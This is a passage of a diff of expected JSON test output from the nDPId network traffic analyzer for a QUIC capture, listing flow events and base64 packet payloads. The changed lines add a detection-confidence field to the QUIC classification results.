NWXrcFpfx77eeqj51aL+3KRVwUbkgRwo5pHgL7hEnxN9VPb3Nbay587MleldGfNDOngB7dKByzM6zduwHhffnRWrDEBE3EQQI5wNwKLOIv9dQzppwC58eZxY0Cxh0nyCfck9L+upLS\/SSPRp0lZCWPVizK57z1DXIwneHbP\/8Hgysu7PPLkyCRSECVbbbitAvbtwLTHK33sAbO3oKAAAXnwbYjqk9lZmdLeO84o92phBblzzTWEVyzJf6XwtEie79iUzv0gOZKqtupDWJnjOgWOhhSra3KOxaFoHE05l7vFbVZMWFjqvSUOIj7aT8pRtZ3A8XiI4yAenMZbx8Noig2Tv\/4iZBtEhsXIEPJ\/GdI+cZsswHBmC4MoRRX8sfAcQcLKC0NsE8iTGSOI5BQZLzHhGSKkGn8XVlyAlmI52p44RHuokDQeePWi0IqXdipLo52vUi32A9W5ZySu8wjwH0+TmQOsjtyEt1WRsQ9wLF3apv\/TUW4+usvpV159wu9QNjO39MwP7rVLYpRTpK2fHgNOq47+RoVsFZDNOEQMG6JcZfYhdRpJCFZTxbCJLGBrNE8SO9hLhrTXR0B0IZGDIZ35DJlgU3Za+yK3uSCBc3IN0p97ksRGA5FKvCPtJcsM2\/csH6\/HU1qf1f0iRNI\/TtUb6I73fJb1bLdQeKNHntzmogBwn9oPuqo+gtLSwtXae5sl70N5g4LrZ8PFnTx2lQMUWHnNA7\/NfKlV24zKPWKBQFEp1Ll+GkIQ4+2VSqwKteIza9AEA0HQRFuVoFbCOySV1C2F5DI6b3bUAcZPOS4EK5sgcvgQXK\/kw5Lml\/5HXzi6wNd7ujorlYuy1rrbgADxiFT3G3+7eEQmrzleWwgR84fGJrsGXGWRRksb0D4sgTRBJoHHnzf+UHtoZlhKZ7MrrWCe+rgmAPKYrQl5HS2h0M4Sd0TsvG35w8Nfd7uE0Cm1gQkCkKH2QZcTaB17nO+93nufc4orBsf0H"}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1621500711118,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621500711118,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidIFAAH4RAyo0uxSvZsLPs9AMAbsFTmIiwf8AAB0ItCn86+Se4YgAAEU0FvsScjgiXb43Z5OHmvEYwaOoC42xDpqJfRfqlKRpZwF5AnAxrqFV79ZpFnEvEhLmveXc5xDzsSroW6m86jG45I0fFyX3DYlFTlRWn6Sytea5JPO12EfJbfqSFvNzEqmQ4gFas2HXJ2FX2ZoFtOrT1Qp43etaUsidgduMrH94THaDB9pQcwHKupL0h5YJ21d4uDpduyjYmRI\/jSmxZ2o5487BjNxGIiLtUrbwVkNIPSfjyMP5aDNyEKH0uc0UKMUvLMNr7XpQ1A1u47hFs287N4mHIG56vvgNzeLUDt0k1MPT\/kGpWCx8pGpFNrvk1nrkx7VkZAvjp\/9BdDBzSjx\/eUYtrNhzQ0IQe0hI2dyVNc8oZJZ9LtwNkx13TL3XaejmmuaYZ5B1EgN210MMBgN2q4MKppTuAvCQdN0rYg1Eetfey1Czpq8DvYrtRob0CYoPxRNQb4hQY+mAtVm5In1K8uiwgIb9fwBZ4878UCDelVNFoIUw+l3DO2r3eQiyJ1qJ2FQD5njNdWfokooKrW7pkJaWp1Su7UEKIwCrHqPQdqZjdBG1V1fXoUW3f50uoUtNBqxzmzG\/nc6r9vmn7Hupo64j5xAOGxtoJ7+CXMmYHHWY26B1SVO8GEqfiJKdUBeSOJP+\/MJ8MxDfNBGk\/ZN++nWubo5tvAD59mguiYbs2TJn97d75ZXwCSvntISAbbWVTp8AcyBv7hFM4CenTfEcDoR0h+9UMmt410Igj8DfCq0uBJ9bfdd9vaavpedqeSBrcaCWj6Vm8lPgRR9m+idu+v42W\/Y7dhhPvUrZYy43dKrTyr1UA6FrlC0+cMVKwBuas+sYqkr29klDCbiXmBJwbwFjeK4tVoMcVU5tgERpJO29uTaQwM9TtLKYYpaiU3bEFvVtP\/Qtn3qhFg87\/I\/RWjoT+rBbR4QDQUW9VPOaC\/zE01OtUPc5D50Oe30bx8WsZ3NjQ\/Rz1culaGAqFUjPGD3UTvfe+YzvsST9oPhqowv7hv2g7D78AygZJDWj3Xy+kWEnj\/pB3Jx0\/OvXiqzf2tizghsbgz\/7TQfvenyU\/YjzQzisVkudIMBHZfHpFf1xszofNNVEViopslpwwFJvvLgUhw0aVf5anl4AFVfHf7Fbiq+ByHxdPrQzfWnqt4ebVjeIYwLQRD+Sc5q5KKw9n351IQvh3iLjQfOMlC29Lv8K\/f64xF454eAM+T3ej9aTbN2lpyk4d44ROP1Oa47QDp0riFycvY47pAgeZtogdK11E5+iMGpqTnOxn9+LXFyNRlhHrvu67ztK3yT1Q38o1K6t76Qdc2LLNxNb42ZTHdtkEvDq4+GjOdvvGXlynEQvbTtvdG6fACdyaH0xeuILHqQCt+BvoL\/9SLWq+5Q6qid0Ax80+f42fP1VeV80Df+srNlHtlx1gxx0eFSN\/ZxupB3yFoybkQHafOdB3DjIHqI2gODRQBgLO27D\/lTmmK6tKkQ951QvnyKrHxord7vZSW3Oq7RRLWR+SVjkGHmv3l\/Ze5hnE5cZJuxcuPAk2mAKwF+6k5B3F+cbJWDnxNeoh4C1jTw62drlxgT1oJkzh1x0IBq5I1mmRgifHxa24oQE8RAkrXlt\/l6PygI3tBmwEN7W9ztIBr0mGHgoMXHSI2+\/eoOzMY2+qscRsVIWNEx6WLxrztwLs9nHe+LJi\/8hqm0+hjADeZHms9rDOsWgE7WwhNZcW0TgSYYOby+hR7hjZUUjIMuY3PvHUBu9nOxFOj6gdeVPSzcIl5MJbJVDUDw2yOc8"}
 00631{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621500710201,"flow_last_seen":1621500712321,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1621500832402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621500832402,"pkt":"AAAAAAAAAAEAS1QMCABFAAVihQ5AAH4R1KOokEAFTOdoXMNnAbsFTmnVw\/8AAB0I\/OwNUvQ+5iAANwD\/vPgHoWBY9NVx91aESVG1GnIYeTvUSJob\/THkhDsxHgK0tQMlP\/y+OlG6T8LyKR+iBLXMyoZE\/aVKFhxdLISFi4uHtAlWOTu3Tp\/rNeF0Ycpw9lNtrGZKHgK52aGmw1F+Vm7gts63ZzZWpjO2b2dfnUcihRfdcWSl8WQQqp9Bex37Efxn8GSZ9yV9+YweKHZuoktgPz6lo1Hx0py7NH2sEOpCsHuOmQV3pkdWkgyH5Yy8e+mDo3M8Lf4uvHc+eXJBa3EaCkPMxen5GcdhzCr3mrXeME5XHL2nTes6kErkbatKTZJBia8PejzLFSjdIh878tNRvmWaKnFQUTDgcDftx6OhWfT9aTAtihrhh80i+NJdXObI+LP5jfp6VUNFk\/iSFBb\/TLXGEWIDnGVL6jXCYr\/jF550paaG2\/05LqVb0lAO2DQezwhWmWBhSJGamJQyHgYTP2G2z579ukMU+m1MIBlp6G0fCF77SkWYSpcZa37JwyO+oGTmTTrQw4DDsfnNJ6qtURb6c1EZgljs+2MQvOyBlUgLiqJfL9Sy7+bVNh6BSZmu2SnB0XsrJz8ExvgL2JeLgA1jPTRz3PGX2IfOOJmvZ\/Iw5bWBcHVXAq+IcoiBl9hHt2AkJHGz\/byaPbJJ66HJfgB14EIB\/lUwQo1A1SSUXMKv\/TK9koxXTwle8Lkn54qEQdqJWRvVbwg0JseXWs8OMsGkFLele\/q07epiVACDd\/g1Jm+ZePpL983W2YeTK+eU7VLHC3JA09oJxkbg1B+bTVBsiq0+mlaeyZ4QsRiZnP+9H4807KaDybRKTE8tQUtEr37hHuYCyw5PxJ8FFjKWt2QiUzVAiu0MjkYwdO09pwoMaH1i59EPGPGNhR57sTKB2wVEV6JE6NQ8yLMvSBUd9dyDB21nWx2ARNrcsc1WlrbGEhGKx8y96up+FRZHCjeNJbO6GPNGdyZS+RcIKDc\/sxkx7RupbqAi+d8Bt+oXDSg0tZAmjCf8VvVg\/k80bbgPZjm5To457D0tTkTf8V6Zx8om4HCzWH0sHPFBmf27ADSR6DlozQlivcbzfZaKUML+CfQN\/AOYuLtlr\/H4lqxR8dtAwKahvwW7\/NRmgYEFXDJN3bJS9GjmGOOgKZxwI0uH7FodIm88enl9xRV0Jvgh8Kgk1aL11oukFFBgq9kowqa4t5sHXxG027eiPUY3I+LvD3YOs01STBZNgyX4zoY1udrG790mdQfHt0JsUey8gKDDV6Mrii7E31WSascM\/TXrq7IBo+QDu6smYU6IFRAByq+cHfvGh9cGLPvAzc\/PaSrCQ8lQZlhadWowHm9HfqjTWwtDDxzY1ZzEFn\/ykUcQ5T517Ga\/PzlrVjwpdzkZabhpXnKYalHNVtkvXskX+fuRlw1O9pywR139ESVKUEegskOPrIBR11Ur8xk0\/nC3Mw1zJ98R1AFW1bQwe+QwJvSpwFpYhm\/2wNkJHrE5fUKBl09Wmtfin\/0fDKjZAnq1XzsVpqje2zDaCTh7VEpkWk5S3q86sRcojMPfzDFUdFBNEIT3dLWmuLxfFG2Ho6lWkZAgHIKSSvHA84mOYVnYLexouIlL+EhwoOmEipiiUiVJXGZkSCwjtyupj0BjO2QULdNBtK\/XGoJduknKIbcYWebyEnEpxO1Cicl7fEXS9+YbM\/rMPWEr+mcAUdeFx32z2bF0zY4DxjEv26u3i5TRnvLzaQCmin\/duWBzxsVC3pO\/wjp9iIlGSS+Qcatkp0jS9\/HNB9\/ya8my0blefl49VH7\/"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621500710201,"flow_last_seen":1621500712321,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1621501125036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501125036,"pkt":"AAAAAAAAAAEAS1QMCABFAAViGchAAH4RgMKokEAFQSEzSv9QAbsFTrOQxv8AAB0IBDctHg05eGMANwA63caAA9thM8CnmtvPCsUhrbHTSUm+PmUcMNSKbWxGe5n0KlMPA\/Ab1TeVXrcKT\/s6bNMGiVVE\/Y\/69wmX+dmpzOGyJXfQtZPXNvgdAety5H0aaOEE7kffH7GYopi+TnU7X81j2zr5T1AcyXW4xwfPQqNjCkl7q4Y3aeDwCNcBIXJjS0cRABpWd4CFVxJeR67TsCsSv5FbpkqXMrDYhjzjrve\/sy87Yz7Z9ci1SSWv37yRACmKZulUZgb2lUkKSfenjONGW3S2wzKcrlj+TJQRg8\/bM9SNvt\/mCcgtVbTKLWbc+6PK5acKkQo3AdoGk5LEPb3l\/lQbLDG7JPRHJbZN8WUgPhRMqvGmH9CVBsbUQhTCVDm79glJnIm864PHxQ+t0sJHyebmg6XpGa2XYkUH2udqnf5+TTklcbBY\/R+qQP9YENJHrWSqS3ukUykQ0LjwlbuFhVHFAQ\/dxjDnWRSWKbRXG1NBvSlBffj33m41y\/BGqblG4oqUMrPzg1AdNzGWkFx3dfG4qE6jX4vypIKbmC7ww11\/bnqazyGvXVb\/qGv65\/bNEhR2F5JiCl4VlKXNgd2pkEqH425n6llnIOarnIlAFSHuFowuohSpsD5QcFX5UcWdhvyCoeuvwf5QxCPPKwuVKkeBE9JZdqIAdgwk6k2JahHoe9xE0fV1WdUs9GEH0pmQ8XxwJfQNNe9pfm7SAvyvW6AGvman3pEUJ3JJN3sVwyOiSI46dmLN\/gLYOaXzUMscfs3uNK42vabWH2f0fHSfBVduUsdDgwj2A9X9vZeZHeEU0AOwu1JroY\/X9M5vYPFxgUn4ui0etmumSVF1NfkFMIHTL2APYRacjCGMcVMTtDDglynqnLKHYUUQtNWqewrNtG9PHzcXuPhHzdOY0tg9FgaoraKpz6q5UqcKBzr2JjkXTep9JNqk5XEbwydGTgI5uoUzDCEAd9SVY58G6YNgOXJM72nV8QMCKvZ3XaSIH5w8qvkn4y+DE1msPs+0jjDIyDXNocrSDJ1AHCTzzWkP+w6H60iAOu9cn+Mnv8SiYPPciI\/PJWXhwM3wLkeNtUoiSczzgq7\/Z0NlAzOcUuSPUr404jqpSbsJLrUCNh2Hh0dkAD64yuGEGkYaLp8R5cHVIH1ItyvLeUglmfKQ9Uy1in+NSc9s9rgslR0ZYvwGV43IdrN1a8sbpRZRn\/6y6xJSP6VRA3qbgEM1014Xzxzg1C1k2pXKaZ3dRIS7DAmfP9AU\/jP7\/XH1KfbRfliwERe1f0hLOCnRYQayZGEdVA7U4EwP4GWIPM1mQJfc4x1wWHWPhcFpf7\/3kzOtmlx8FRonLLppe8qkuqfrTbLOUjx4ZI4BETBbxLbvlIKHEhoiCBd+yDUZCFKScdNpwrxVWVSz0cwfPkFvXivV0Btog7bQP8r0ps03inXLu3iY42JhuwOQtgnq9gOUYo5mWHDsf\/dFNji6zcIuareN16h5QMAId9cs9d8XeEtgmsP3EkHv62qC0lObg7DYq50UhiG+dr7cGC8xrqlQYyQ2eUFldqUAvW5Yq3oPDufxJfRMe4FoawMPGgol1Fx4lcF3O9ljlCrqKWUD5XziIcnMUjDT5ommu1A4ChUADEhFdaXkO3z0ajdsvt+2FU+8jk8sCeHs0aoS8LD9tqGOK\/tBhpgsLDtXqVg4vWFfDpOmZ6anyereIg5y9YTigYUAnRYoUArd1znOjveswaiQB3BfOR1AQE\/Wu+8zomZDAHW7r3Or47VOVnEd3KueolaHuDAxCBxZQsZy"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1621501260783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501260783,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVLhAAH4RRAufdbB8z3k\/XPqGAbsFTtJqyv8AAB0IqwzBH+7SJ6oAAEU0OmGuRD6o6zt6nf9tmhZ4egDU3ziCGGMLigzQd\/qcgJuXuFXJaHBdLU0MBpsdPKMeIvS9Od3J6aS7A4aqWHEzIUcAYpLZNGiwuH3wRo\/ZCRSY8hB6LE3YzLe42CdSzc5lCzItOsVUkYEC0ElANHXZEVA1CYAydF9uHTTyCq2uXRt3pMNkc6SD2TRzdAjxNMy4aC+pKc8u60PxO0LJCtV5c4GHi\/apOFYyznJrd5zwDibl6ADYf0eOlYG7Dmb+62KXGzs+UZINoqFEItj8sokCUApXkVgH3JMM1tQ7\/i+CPMar5u5VhzM0xoMe4DQC0z+Yuf3p0TEn1Yqj0xXSzHscv\/FAGmONfCIQGf4DqCpAxJhcdINRN9hpMwFEfhYgZXMbdUkpqQbEUlH6Jh8L0xXSG8BNDbJ+HqsCUU8yfHEs9031W1jXujoXsokpBHj6NRhfYT40cfJ0owXrRfPAsakJrEfIbY678aDECo1jdyeAUnmWY+XbG8o1nY\/4ODgRYgmuoc3IOboNUvx8dTlRVrTI1abSpt63k1mZBwz2PcIo80+jYFQUD8COKs9GGRBzV5HYfMiKnpB8E0fvddrtWuczrHTEHaj+A8EU23AUAoyRQeuZRJ2ND3muZ5PofS2Dkb\/RLqYEnLx53b3gsbjBEhQD9jTXMS\/CkNOxA2dXLmL1VCbZDM001ClSjf0VqrWyNkHZ020vH5Z87sRnfqRjhEFyC6btyFOJe50iTVCZPNiJgpQQjGKjO4rNKkdOhqVKJYV3tZ30pOlvkz82jkWMMrXlfnLtb9s5pzTLv9t0tUOoQ4QgbRKhgDzve\/xApJG8bUCntJD7lpCAx9F9HoZMq40CxcFnF2sEh63lTmmld2YtjKFNOpA3UantQuZCNL\/CmftmHYYLrD7QkKm4TvXgbIR8RxVZ+EtiDOPLtHOx6d9B7dMcTY3Mfmi0JILNHIfrPCWog+RxVMh6d8lhNxI62zpKHPU0Tg6vqeO8SzyLB\/n8diVDpb66xI152GpmYVi2GA2rWPfxVjszVl5jtF3gWEj8sOvNX3xomkTvDqEIOlWFIFjdzSMYAaE\/94dpPwrnlUXOlwVZbLyG8zBkrVJIJEL0VFlCRP3cPWR9GCwyqZp3TvaFXw65QoKcuAiLNfsKEEBT7thsxAP5ShRNnKnAVngImJT7\/QyRjMLgNdZQiVPKJgKxlHmR4CKW3EdPdCekSxLH3DqHQePQJoWyWmK2uMuElqVzImkMVeqUtVe1Z7XAmQ74ZmJX77RfTpYOUgTJWLw8yAw1CjfU5hA0NqXKDuF\/siEDZ0glp7FNdcWvBjbo\/ABe7QhVen4FOuDzJ7O3om6ZklR7mLYelWmYJHFfypdJF0Xj+hmRP2HWSSx4\/j6XqYC2eVviMKbyBDVQQPI0EM6QnNDTPPWP8a+XfmtmdlLc9QgUY0RmRpsrtKa+1IyPqG93eGTD+ZSsMgyIEQWA5Fm5wsK4NEmZ+pC9UWL57aEkWkIPEN4XlJ\/9JPPb3uZ2vDE\/Va0Bb1Y7vNFgBYQGZaZLzo9Gdz7yiHwLVKre1BC0kz+KfDM03+0yKx5CFVmJ\/kBO0+wIW17IRrXQXE0U0ProK9hPHRKvARb03bAuREr6TJR10+JsF1ImGW+lnDDK1\/FtTCgnzrxyWlFZM3Cg6kZN\/6ZrM2A49rBarb0aVirmITUvU59YafXCiT9ymjQXREvUsDHNYJ68Utiz2AdjCI7phJ86HXYCIFDLKUZ7rKmhC6fjynuAGp9kfCbPkPfnqyMDrXIJ"}
-00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1621501261082,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501261082,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVMVAAH4RQ\/6fdbB8z3k\/XPqGAbsFTnp7xf8AAB0IqwzBH+7SJ6oAAEU0QCGjYmqsUMXHqnSGAa+SGBqQKewpsFPBcHbIO1VQVQmdi3mM6XPwhlgoWrccirvAt2h4VgoFMSMBKUnjc\/s7c31zMKNVAjGwqSS9UcMQe+beIWng48oRC5FQxFxp76d9NvJFZQrnobOu9\/OI9vLd\/kjxzUXkKaoMqPw3HA3NrHDmVaI1U1G916dAe3tpfhldRg8TG66kkZbvUPojfmBk6b2Z19o0wD3eL3ArF1ggKa7dtmOX3vPsGSHppdsAwy05mrGdBMogG2GNPoz1f6Mrx1CryOOeu7sX8P0doH1Sq0iFILD1hylRmMMZ5Opz0H2bi9KA7w\/Ag2fPK0T9oDIw0fFaoOFIf0DJ+lEFoJl+bUaUeYjpiNWRiJKG6uA\/8tslFXAk5id\/lQWKSBH2JicuyYgt3WXJe70ZAzp2iJ\/c\/DtJGyES\/AMV8JsInY9TNZ4RXPUu+I\/eX7SJpitBsTdhCEwJGiE0dT1TYgPIAD7IuBR125WX32fSO6pJg\/SC52+hata3geWR8gYaq0AXNqoDGePDOkIXu0L29JvXGLb3VjgkzsU7GDWMMiBS57s7K1nDWVaICtgb8tHvX+qm2yAEqxNTZylYIiRmNXEmMd4aEPfVCDRnoLnzwSUCqP2hNYKZWNP\/L4ttvwS03mes81iB3GFItzHUXUjDko+av7CA0J3KO8YO\/MegXhauhWaOMhTq9siY897rXz2nMEjgxielkq2WyMK6PT7GQGMUlCvVs2Lh0wr5fTdVSGH3n8y5kmB+Cpz3AWzqb0PCrL7nfp1ZQdKXBaV+\/8ls7T8As7zUGDLh1cEJLF5+OvQcPuWBETyYL6v6P0nP5uBkBK24BlVWM\/6sea6ivZVTU1ytJuTc4EW8eV7cOfQv3Z0ZvtO\/E+dtnWbRbm1+xnHQSTJejv0j+x\/5AGS7d9EBuJMkNcE8AQ4pldxgHz7Ptlg1BHWeyw3V53MEbQaaKLxV0WAfr2iBsH3t5M6hAvRICNnnoroLK7ICwfeGHvOCdHXa+iqtGu6TGnIJmUNgGQqP1S8MgI4WSJKg4gkxYOG8Yq8I6m3HzLsup78oZ6bqytrclhVLejrz8Tk1wQFWeJGz1cSVmJ7dlJY4MD8VT3IFiybLNnMNNe7YmlJus\/1uc9POON3uOlN0OXN57myRfk